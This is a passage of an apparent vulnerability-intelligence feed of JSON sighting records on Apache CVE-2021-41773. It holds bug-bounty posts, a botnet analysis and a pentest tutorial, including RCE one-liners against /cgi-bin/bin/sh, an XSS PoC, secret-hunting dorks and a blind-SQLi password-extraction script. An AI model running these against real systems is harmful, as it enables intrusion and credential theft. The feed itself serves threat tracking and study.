Inj\nhttps://t.me/cybersecuritytechnologies/4202\nCVE-2021-42013 - Apache 2.4.50 Path Traversal\nhttps://t.me/cybersecuritytechnologies/4475\nCVE-2021-22205 - GitLab CE/EE RCE\nhttps://t.me/cybersecuritytechnologies/4602\nCVE-2021-40449 - UaF in the NtGdiResetDC function of the Win32k driver\nhttps://t.me/cybersecuritytechnologies/4535\nCVE-2021-40438 - SSRF in Apache2 mod_proxy\nhttps://t.me/cybersecuritytechnologies/4529\nCVE-2021-30858 - UaF in WebKit\nhttps://t.me/cybersecuritytechnologies/4545\nCVE-2021-30883 - iOS IOMFB vulnerability\nhttps://t.me/cybersecuritytechnologies/4497\nCVE-2021-30892 - Shrootless Vulnerability in MacOS\nhttps://t.me/cybersecuritytechnologies/4623\nCVE-2022-1337 - \"View Source\"\nhttps://mobile.twitter.com/megab0t_/status/1452848917205458945\nPoC: JavaScript:https://#%0aalert('xss')", "creation_timestamp": "2021-11-08T11:07:01.000000Z"}, {"uuid": "902a9914-2b2e-422d-a524-bf6529b64a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/bhhub/589", "content": "#BugBountyTips of the Day\nHere is a new write-up on my blog about a recent P1 found on an external program :)   https://t.co/vfKIKs8JjT  Thanks @infosec_au for the help\ud83e\udd1d  #BugBounty #SharingIsCaring\n---\nUpdate : CVE-2021-41773 POC as RCE \ud83d\udd25\ud83d\udc47\ud83d\udca5  \u2705One Liner: cat file | while read host do ; do curl --silent --path-as-is --data \"echo;id\" '$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' | grep \"uid\" &amp;&amp; echo \"$host \\033[0;31mVuln\\n\"|| echo \"$host \\033[0;32mNot\\n\";done  #infosec #bugbounty", "creation_timestamp": "2021-10-07T13:37:04.000000Z"}, {"uuid": "2bed552a-1a3d-4665-9fc7-95e28792ac80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/bhhub/588", "content": "#BugBountyTips of the Day\nAccount Takeover through Password Reset :  1. Capture the request of forgot password   victim@gmail.com   and tamper mail id and change to attacker@gmail.com   Finally will get victim reset link  to attacker mail   #bugbounty #wapt #cybersecurity\n---\nPath traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49  All-in-One reproduction for CVE-2021-41773  https://t.co/xeC7X4xeX1  #Vulhub #infosec #security #bugbountytip  https://t.co/DhD8BFin4o\n---\nScanning for CVE-2021-41773 (Apache 2.4.49 - Path Traversal) using template shared by @daffainfo   Template -  https://t.co/CX1j1ku5Ot  #hackwithautomation #pentest #bugbounty  https://t.co/DPSeLu3kA6\n---\nA lot of companies are using OKTA for authentication these days. Use these GitHub dorks to find some secrets:)  OKTA_CLIENT_ORGURL= OKTA_CLIENT_TOKEN= OKTA_OAUTH2_CLIENTSECRET= OKTA_OAUTH2_CLIENTID= OKTA_AUTHN_GROUPID=  #bugbountytips\n---\nmany have questioned. this poc.. hi I've made the nuclei-templates ahead of time you can check them out here @pdnuclei  https://t.co/vtJOxs2UCq  #nuclei #automation #bugbounty\n---\nJust got worked exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips \ud83d\udc40  https://t.co/oGHtbWwKHT\n---\n5k reputations swag from @Hacker0x01   #bugbounty  https://t.co/JkVYmaF7V8", "creation_timestamp": "2021-10-06T13:37:05.000000Z"}, {"uuid": "c895a6c0-b8dd-4ebb-9375-dc9d4388adce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/bhhub/590", "content": "#BugBountyTips of the Day\nCVE-2021-42013 - Apache 2.4.49/2.4.50 - Path Traversal by nvn1729  \"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient\" -  https://t.co/AK4CQpDGA4  Nuclei Template -  https://t.co/SOY8iTU8Bk  #hackwithautomation #bugbounty #appsec #pentest  https://t.co/dH7StiF3Sd\n---\nWait What? \ud83d\udd25 Apache CVE 2021-41773  One Liner Windows Box: \u2705  curl -sk \u2014path-as-is \" http://host/cgi-bin/.%2e/.%2e/.%2e/.%2e/Windows/System32/cmd.exe?/c+calc.exe\"  #infosec #bugbounty #Apache #cve\n---\n\ud83d\udd25\ud83e\udd11\ud83e\udd11 Neat bug bounty I just got. You can hack Google and use their API to make their search engine search for things:  curl  https://t.co/DQV3mlvADS{QUERY HERE}  Nice little \u00a320,160 bounty! Thank you \ud83d\ude3b\ud83d\ude3b  All public APIs are vulns \u26a1\u26a1\u26a1  Follow for more #bugbounty tips!  https://t.co/GBiv7j8nhK\n---\nSo I reported a RCE to a domain owned by IBM (@Hacker0x01 program) . It was Triaged and now closed as informative because the servers are owned by Amazon.  Scope rules say 'domains owned by IBM'  Imagine all companies use this excuse. \ud83d\ude02 \ud83d\ude02  #bugbountytips #BugBounty\n---\nAlways test JSON body parameters. In my case I bypassed email verification.  #bugbountytips  https://t.co/pDzPfkJOl7\n---\nExpand your attack surface by grabbing SSL certificates from ip addresses, match these with your Bug Bounty targets.  I'd recommend running this technique on cloud providers such as AWS/Azure/GCP ranges  using  https://t.co/uvvFVrKTXC  cero [CIDR] (cero 0.0.0.0/0)  #bugbountytips", "creation_timestamp": "2021-10-08T13:37:04.000000Z"}, {"uuid": "7d395570-60bc-417d-b090-4598dcd9492d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/GithubRedTeam/85053", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2021-41773-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a wvverez\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-20 15:52:55\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPoC (Proof of concept) of Path traversal + RCE in Apache HTTP Server 2.4.49\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-20T16:01:51.000000Z"}, {"uuid": "e3288d51-89b6-4bd3-ae74-efa191e70ecc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/Ut-FjakO3aXzYeDJVS314i2vHRpchsUAjvXH-nUbNwT5URU", "content": "", "creation_timestamp": "2026-05-20T21:00:04.000000Z"}, {"uuid": "9614eae7-061c-40f0-be96-90fd272d10ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/toolslounge/85", "content": "apache srever exploit \nCVE-2021-41773\nhttps://github.com/rapid7/metasploit-framework/pull/15754", "creation_timestamp": "2021-10-08T06:45:33.000000Z"}, {"uuid": "bdafc7d3-4591-46fc-bf0e-fd1bfccdf74d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/poxek/6168", "content": "\u041a\u0430\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0431\u043e\u0442\u043d\u0435\u0442-\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0447\u0435\u0440\u0435\u0437 \u0431\u044d\u043a\u0435\u043d\u0434-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0438 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 fingerprints\n#botnet #apache #CVE #TI #honeypots\n\n\u041d\u0430\u0448\u0435\u043b \u0433\u0430\u0439\u0434 \u043f\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0443 \u0431\u043e\u0442\u043d\u0435\u0442-\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0430\u0440\u044b\u0439 Apache-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442. \u0410\u0432\u0442\u043e\u0440 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u043a\u0430\u043a \u043f\u043e \u043f\u0435\u0440\u0435\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u0431\u044d\u043a\u0435\u043d\u0434-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0438 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u044b\u043c TLS/HTTP/SSH-\u043e\u0442\u043f\u0435\u0447\u0430\u0442\u043a\u0430\u043c \u043c\u043e\u0436\u043d\u043e \u0441\u043e\u0431\u0440\u0430\u0442\u044c \u0438\u0437 \u0440\u0430\u0437\u0440\u043e\u0437\u043d\u0435\u043d\u043d\u044b\u0445 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0446\u0435\u043b\u044c\u043d\u0443\u044e \u043a\u0430\u0440\u0442\u0438\u043d\u0443 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439. \u0413\u043b\u0430\u0432\u043d\u0430\u044f \u043c\u044b\u0441\u043b\u044c \u2014 \u0434\u043b\u044f \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u0438 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432 \u0432\u0430\u0436\u043d\u043e \u0443\u0445\u043e\u0434\u0438\u0442\u044c \u043e\u0442 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u043a \u043c\u0435\u043d\u0435\u0435 \u0438\u0437\u043c\u0435\u043d\u0447\u0438\u0432\u044b\u043c \u043c\u0430\u0440\u043a\u0435\u0440\u0430\u043c.\n\n\u267e\ufe0f\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438\u267e\ufe0f\n\n\u041a\u043b\u044e\u0447\u0435\u0432\u043e\u0439 \u043e\u0431\u044a\u0435\u043a\u0442 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u2014 \u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u0440\u043e\u043f\u043f\u0435\u0440\u044b \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u044d\u0442\u0430\u043f, \u0438 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u044b\u0435 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u043e\u0442\u043f\u0435\u0447\u0430\u0442\u043a\u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 (JA4, JA4H, HASSH). \u0421\u0435\u043d\u0441\u043e\u0440\u044b \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442 \u0444\u0430\u043a\u0442 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f, HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b TLS-\u0440\u0443\u043a\u043e\u043f\u043e\u0436\u0430\u0442\u0438\u044f, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c staging-URL \u0438 \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u043e\u0432 \u0434\u0430\u0436\u0435 \u043f\u0440\u0438 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 base64 \u0438 shell_exec \u0432 PHP-\u0441\u043a\u0440\u0438\u043f\u0442\u0430\u0445.\n\n\u041d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u044d\u0442\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0433\u0440\u0430\u0444:\n\n\u25aa\ufe0f\u0443\u0437\u043b\u044b \u2014 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 IP \u0438 staging-\u0445\u043e\u0441\u0442\u044b,\n\u25aa\ufe0f\u0440\u0435\u0431\u0440\u0430 \u2014 \u0444\u0430\u043a\u0442\u044b \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u043e\u0432;\n\u25aa\ufe0f\u0441\u0432\u044f\u0437\u0438 \u043c\u0435\u0436\u0434\u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0441\u0442\u0440\u043e\u044f\u0442\u0441\u044f \u043f\u043e \u043e\u0431\u0449\u0438\u043c delivering-IP, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u0434\u0435\u043b\u044f\u0442\u044c \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u044b\u0435 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u044b \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439.\n\n\u267e\ufe0f\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430\u267e\ufe0f\n\n\u25aa\ufe0f\u0410\u0432\u0442\u043e\u0440 \u0432\u044b\u0434\u0435\u043b\u044f\u0435\u0442 \u043a\u043b\u0430\u0441\u0442\u0435\u0440 \u0438\u0437 1 001 IP \u0432 \u0441\u043e\u0442\u043d\u044f\u0445 \u0441\u0435\u0442\u0435\u0439 \u0438 \u0434\u0435\u0441\u044f\u0442\u043a\u0430\u0445 \u0441\u0442\u0440\u0430\u043d, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0432\u043e\u0441\u0435\u043c\u044c\u044e staging-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0438 \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0432 \u043e\u0434\u043d\u0443 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0443\u044e \u044d\u043a\u043e\u0441\u0438\u0441\u0442\u0435\u043c\u0443.\n\n\u25aa\ufe0f\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0441\u0442\u0440\u043e\u0438\u0442\u0441\u044f \u043d\u0430 CVE-2021-41773 \u0438 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 %%32%65, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043d\u0430 /cgi-bin/.../bin/sh \u043f\u043e 80/443.\n\n\u25aa\ufe0f\u0421\u0430\u043c\u043e\u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0439\u0441\u044f \u0448\u0435\u043b\u043b apache.selfrep \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0445\u043e\u0441\u0442\u044b \u0432 \u043d\u043e\u0432\u044b\u0435 scanning- \u0438 delivery-\u0443\u0437\u043b\u044b.\n\n\u25aa\ufe0f\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 JA4/JA4H \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u044e\u0449\u0438\u0435 \u0440\u0435\u0434\u043a\u0438\u0435 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u043e\u0442\u043f\u0435\u0447\u0430\u0442\u043a\u0438 \u0443 \u0441\u043e\u0442\u0435\u043d IP, \u0447\u0442\u043e \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u043e\u0431\u0449\u0438\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 \u0438\u043b\u0438 \u0441\u0445\u043e\u0436\u0443\u044e \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0441\u043a\u0430\u043d\u0435\u0440\u0430.\n\n\ud83d\udd17\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a \u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438\n\n\ud83c\udf1a @poxek | \ud83d\udcf2 MAX |\ud83c\udf1a \u0411\u043b\u043e\u0433 | \ud83d\udcfa YT | \ud83d\udcfa RT | \ud83d\udcfa VK", "creation_timestamp": "2026-05-31T09:03:34.000000Z"}, {"uuid": "243c24d9-2bc7-488f-bfde-7e6e41208c67", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/97c85e27-5a91-4a60-9a66-9707e2ddb39d", "content": "", "creation_timestamp": "2026-06-19T12:47:54.687397Z"}, {"uuid": "c0af862d-8a14-4060-bde0-d953e09e456e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/TVtxpSB4iwrvIXXlutpCUssAWfUx6ePGQSvGhJ6GLoy4r6Mi", "content": "", "creation_timestamp": "2021-10-06T08:31:03.000000Z"}, {"uuid": "a25103cc-88ce-43e9-ac72-d84eee261225", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/bluetrollplei/75a1dd5bcdba2fc3ded4e332998e8d17", "content": "# \u6e17\u900f\u6d4b\u8bd5\u5b66\u4e60\u8def\u7ebf\uff1a\u4ece\u7f51\u7edc\u63a2\u6d4b\u5230\u5185\u7f51\u6a2a\u5411\n\n**\u73af\u5883\u524d\u63d0**\uff1a\u672c\u6587\u57fa\u4e8e Kali Linux 2023.4 \u548c Python 3.11 \u73af\u5883\u7f16\u5199\uff0c\u6240\u6709\u5de5\u5177\u5747\u6765\u81ea\u5b98\u65b9\u4ed3\u5e93\u6216\u53ef\u4fe1\u6e90\u3002\u5efa\u8bae\u8bfb\u8005\u5728\u5c01\u95ed\u9776\u573a\uff08\u5982 VulnHub \u6216 HackTheBox\uff09\u4e2d\u5b9e\u8df5\uff0c\u5207\u52ff\u5728\u672a\u7ecf\u6388\u6743\u7684\u4e3b\u673a\u4e0a\u64cd\u4f5c\u3002\n\n---\n\n### 1. \u7b2c\u4e00\u9636\u6bb5\uff1a\u4fe1\u606f\u6536\u96c6\u4e0e\u7aef\u53e3\u626b\u63cf\n\n\u6e17\u900f\u6d4b\u8bd5\u7684\u7b2c\u4e00\u6b65\u662f\u6478\u6e05\u76ee\u6807\u7f51\u7edc\u62d3\u6251\u4e0e\u5f00\u653e\u670d\u52a1\u3002\u63a8\u8350\u6309\u4ee5\u4e0b\u987a\u5e8f\u9010\u6b65\u63a8\u8fdb\uff1a\n\n- \u4f7f\u7528 `nmap` \u8fdb\u884c\u5b58\u6d3b\u4e3b\u673a\u53d1\u73b0\uff1a`nmap -sn 192.168.1.0/24`\n- \u5bf9\u5b58\u6d3b\u4e3b\u673a\u6267\u884c\u7aef\u53e3\u626b\u63cf\uff1a`nmap -sS -sV -O `\n- \u5c06\u7ed3\u679c\u8f93\u51fa\u4e3a XML\uff0c\u518d\u7528 `xsltproc` \u8f6c\u4e3a\u62a5\u544a\n\n&gt; **\u63d0\u793a**\uff1a\u9ad8\u5e76\u53d1\u626b\u63cf\u5bb9\u6613\u89e6\u53d1 IDS/IPS\uff0c\u751f\u4ea7\u73af\u5883\u4e2d\u8bf7\u4f7f\u7528 `-T2` \u964d\u901f\uff0c\u6216\u501f\u52a9\u4ee3\u7406\u94fe\u9690\u85cf\u771f\u5b9e IP\u3002\n\n\u626b\u63cf\u7ed3\u679c\u4e2d\u5e38\u89c1\u7684\u662f SSH\u3001HTTP\u3001MySQL \u7b49\u670d\u52a1\u3002\u6bcf\u4e2a\u7aef\u53e3\u90fd\u53ef\u80fd\u662f\u4e00\u4e2a\u7a81\u7834\u53e3\uff0c\u4f46\u4e0d\u8981\u6025\u4e8e\u66b4\u529b\u7834\u89e3\u2014\u2014\u5148\u5c1d\u8bd5\u670d\u52a1\u9ed8\u8ba4\u51ed\u8bc1\u4e0e\u5e38\u89c1\u6f0f\u6d1e\u3002\n\n---\n\n### 2. \u7b2c\u4e8c\u9636\u6bb5\uff1a\u6838\u5fc3\u6982\u5ff5\u2014\u2014\u6f0f\u6d1e\u5206\u7c7b\u4e0e\u5229\u7528\u94fe\n\n\u7406\u89e3\u6f0f\u6d1e\u7684\u6839\u6e90\u6bd4\u8bb0\u4f4f\u5de5\u5177\u53c2\u6570\u66f4\u91cd\u8981\u3002\u5173\u952e\u6982\u5ff5\u5305\u62ec\uff1a\n\n- **\u6ce8\u5165\u7c7b**\uff08SQLi\u3001\u547d\u4ee4\u6ce8\u5165\uff09\uff1a\u901a\u5e38\u7531\u672a\u8fc7\u6ee4\u7528\u6237\u8f93\u5165\u5bfc\u81f4\n- **\u914d\u7f6e\u7f3a\u9677**\uff08\u5f31\u53e3\u4ee4\u3001\u9ed8\u8ba4\u8def\u5f84\uff09\uff1a\u5229\u7528\u6807\u51c6\u5b57\u5178\u5373\u53ef\u7a81\u7834\n- **\u6743\u9650\u63d0\u5347**\uff08\u5185\u6838\u6f0f\u6d1e\u3001SUID \u6587\u4ef6\uff09\uff1a\u9700\u8981\u672c\u5730\u4f4e\u6743\u9650\u540e\u6267\u884c\n\n\u4ee5\u4e0b\u662f\u4e00\u4e2a\u6e17\u900f\u6d4b\u8bd5\u4e2d\u7684\u5178\u578b\u914d\u7f6e\u6587\u4ef6\u793a\u4f8b\uff0c\u7528\u4e8e\u81ea\u52a8\u626b\u63cf\u540e\u63d0\u53d6\u670d\u52a1\u6307\u7eb9\u5e76\u751f\u6210\u5f85\u5229\u7528\u5217\u8868\uff1a\n\n```python\n# config_loader.py \u2014 \u670d\u52a1\u6307\u7eb9\u914d\u7f6e\u6a21\u677f\nservices = {\n    \"Apache 2.4.49\": {\n        \"cve\": \"CVE-2021-41773\",\n        \"type\": \"path_traversal\",\n        \"exploit_path\": \"/cgi-bin/.%2e/%2e%2e/usr/bin/id\"\n    },\n    \"OpenSSH 7.2p2\": {\n        \"cve\": \"CVE-2016-6210\",\n        \"type\": \"user_enumeration\",\n        \"payload\": \"ssh -o PreferredAuthentications=none \"\n    },\n    \"MySQL 5.5.x\": {\n        \"cve\": \"CVE-2012-2122\",\n        \"type\": \"auth_bypass\",\n        \"payload\": \"for i in {1..1000}; do mysql -u root -h  --password=bad; done\"\n    }\n}\n\ndef load_config():\n    # \u8bfb\u53d6\u5916\u90e8\u914d\u7f6e\u6587\u4ef6\u6216\u76f4\u63a5\u4f7f\u7528\u786c\u7f16\u7801\u5b57\u5178\n    return services\n```\n\n\u6b64\u914d\u7f6e\u53ef\u5728\u81ea\u52a8\u5316\u811a\u672c\u4e2d\u5feb\u901f\u5339\u914d\u626b\u63cf\u7ed3\u679c\uff0c\u4ece\u800c\u7f29\u77ed\u4eba\u5de5\u67e5 CVE \u7684\u65f6\u95f4\u3002\n\n---\n\n### 3. \u7b2c\u4e09\u9636\u6bb5\uff1a\u5b9e\u6218\u2014\u2014\u5229\u7528 SQL \u6ce8\u5165\u83b7\u53d6\u6570\u636e\n\n\u638c\u63e1\u4e86\u626b\u63cf\u4e0e\u914d\u7f6e\u540e\uff0c\u6211\u4eec\u8fdb\u5165\u6700\u5173\u952e\u7684\u5229\u7528\u73af\u8282\u3002\u4ee5\u5e03\u5c14\u578b SQL \u6ce8\u5165\u4e3a\u4f8b\uff0c\u9700\u8981\u6784\u9020 payload \u5e76\u9010\u5b57\u7b26\u731c\u6d4b\u6570\u636e\u5e93\u5185\u5bb9\u3002\u5229\u7528\u94fe\u5982\u4e0b\uff1a\n\n1. \u68c0\u6d4b\u6ce8\u5165\u70b9\uff1a`' OR 1=1--`\n2. \u786e\u5b9a\u5b57\u6bb5\u6570\uff1a`' ORDER BY 3--`\n3. \u679a\u4e3e\u6570\u636e\u5e93\u540d\uff1a`' UNION SELECT database(),2,3--`\n\n\u4ee5\u4e0b\u662f\u4e00\u6bb5 Bash \u811a\u672c\uff0c\u5b9a\u4e49\u5e76\u5c01\u88c5\u6ce8\u5165\u8fc7\u7a0b\u4e2d\u9700\u8981\u4f20\u9012\u7684\u6570\u636e\u7ed3\u6784\uff08\u5373\u8bf7\u6c42\u6a21\u677f\u4e0e\u54cd\u5e94\u5224\u65ad\u903b\u8f91\uff09\uff1a\n\n```bash\n#!/bin/bash\n# sql_enum.sh \u2014 \u7b80\u6613\u5e03\u5c14\u76f2\u6ce8\u8bf7\u6c42\u6a21\u677f\nTARGET=\"http://example.com/vuln.php\"\nPARAM=\"id=1' AND SUBSTR((SELECT password FROM users LIMIT 0,1),$POS,1)='$CHAR'-- \"\n\n# \u5b9a\u4e49\u54cd\u5e94\u7801\u68c0\u67e5\u51fd\u6570\ncheck_response() {\n    local response=$(curl -s -o /dev/null -w \"%{http_code}\" \"$TARGET?$PARAM\")\n    if [[ \"$response\" == \"200\" ]]; then\n        return 0  # \u5b57\u7b26\u5339\u914d\n    else\n        return 1\n    fi\n}\n\n# \u9010\u5b57\u7b26\u904d\u5386\u5bc6\u7801\nPASSWORD=\"\"\nfor POS in {1..32}; do\n    for CHAR in {a..z} {0..9}; do\n        if check_response \"$POS\" \"$CHAR\"; then\n            PASSWORD+=\"$CHAR\"\n            break\n        fi\n    done\ndone\necho \"Found password: $PASSWORD\"\n```\n\n\u8be5\u811a\u672c\u904d\u5386 32 \u4f4d\u5bc6\u7801\uff0c\u6bcf\u6b21\u8bf7\u6c42\u4ec5\u6539\u53d8\u4e00\u4e2a\u5b57\u7b26\uff0c\u76f4\u5230\u627e\u5230\u5339\u914d\u3002\u5b9e\u9645\u6e17\u900f\u4e2d\u53ef\u7ed3\u5408\u591a\u7ebf\u7a0b\u52a0\u901f\uff0c\u540c\u65f6\u914d\u5408 `--data` \u53c2\u6570\u5904\u7406 POST \u8bf7\u6c42\u3002\n\n---\n\n\u5173\u4e8e\u81ea\u52a8\u5316\u6f0f\u6d1e\u5229\u7528\u6846\u67b6\u7684\u66f4\u591a\u5b9e\u73b0\u7ec6\u8282\uff0c\u53ef\u53c2\u8003 \u987a\u53d1\u5a31\u4e50 \u7684\u6280\u672f\u4e13\u680f\uff0c\u5176\u4e2d\u6574\u7406\u4e86\u4e0d\u540c\u573a\u666f\u4e0b\u7684\u8f7d\u8377\u6784\u9020\u65b9\u6cd5\u3002\n\n\u5b8c\u6210\u4ee5\u4e0a\u4e09\u4e2a\u9636\u6bb5\u7684\u8bad\u7ec3\u540e\uff0c\u4f60\u5e94\u5f53\u80fd\u591f\u72ec\u7acb\u5b8c\u6210\u4ece\u7f51\u7edc\u63a2\u6d4b\u5230 Web \u6f0f\u6d1e\u5229\u7528\u7684\u521d\u7ea7\u6e17\u900f\u6d4b\u8bd5\u3002\u540e\u7eed\u8fdb\u9636\u65b9\u5411\u5305\u62ec\u5185\u7f51\u96a7\u9053\u642d\u5efa\u3001\u57df\u73af\u5883\u63d0\u6743\u3001\u514d\u6740\u5bf9\u6297\u7b49\u2014\u2014\u6bcf\u6761\u8def\u7ebf\u90fd\u503c\u5f97\u6df1\u5165\u94bb\u7814\u3002\n", "creation_timestamp": "2026-06-22T10:00:53.000000Z"}, {"uuid": 